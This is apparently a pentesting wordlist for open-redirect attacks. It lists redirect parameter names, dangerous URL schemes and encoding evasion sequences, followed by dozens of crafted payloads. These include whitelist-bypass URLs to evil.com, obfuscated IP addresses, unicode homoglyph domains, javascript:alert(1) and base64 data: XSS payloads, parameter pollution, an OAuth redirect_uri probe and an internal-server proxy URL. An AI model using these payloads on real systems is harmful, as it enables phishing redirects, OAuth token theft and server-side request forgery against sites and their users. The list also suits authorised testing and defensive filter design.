# Common Redirect Parameters
url=
redirect=
redirect_uri
next=
return=
return_to=
rurl=
dest=
destination=
go=
forward=
href=
link=
login=
logout=
exit=
checkout=
continue=
callback=
success=
failure=
uri=
path=
file=
page=
from=
to=
domain=
host=
port=
protocol=
# Dangerous Protocols & Prefixes
ftp://
javascript:
data:
about:
tel:
mailto:
skype:
ssh:
vnc:
rdp:
# Evasion Techniques
%0d
%0a
%09
%00
%2f%2f
%5c%5c
%252f
%25252f
# Common Vulnerable Domains
login.
auth.
account.
www.
api.
oauth.
sso.
# URL Shortener Domains
bit.ly
goo.gl
tinyurl.com
ow.ly
t.co
is.gd
buff.ly
/%09/example.com
/%2f%2fexample.com
/%5cexample.com
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
////%09/example.com
////example.com/
////example.com/%2e%2e
////example.com/%2f..
///\;@example.com
///example.com
//google.com/%2f..
//www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
//google%E3%80%82com
//google%00.com
//google%0d%0a.com
/%252eexample.com
/%2f%5c%2fgoogle.com
/https:%5c%5cgoogle.com
/\google.com
/\/google.com
//google.com%23evil.com
//whitelisted.com.evil.com
//whitelisted.com@evil.com
//whitelisted.com%09evil.com
//whitelisted.com%252eevil.com
//whitelisted.com\.evil.com
https://whitelisted.com?evil.com
//216.58.214.206
//0330.0072.0327.0116
//0xd83ad74e
//3627734734
javascript:alert(1)
javascript://%250Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
/%09/javascript:alert(1)
?next=whitelisted.com&next=evil.com
?url=https://evil.com&token=legit
?redirect=//evil.com
?returnUrl=\\evil.com
//ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
//ｇｏｏｇｌｅ.ｃｏｍ
//google。com
https://target.com/oauth?redirect_uri=
https://target.com/proxy?url=http://internal.server
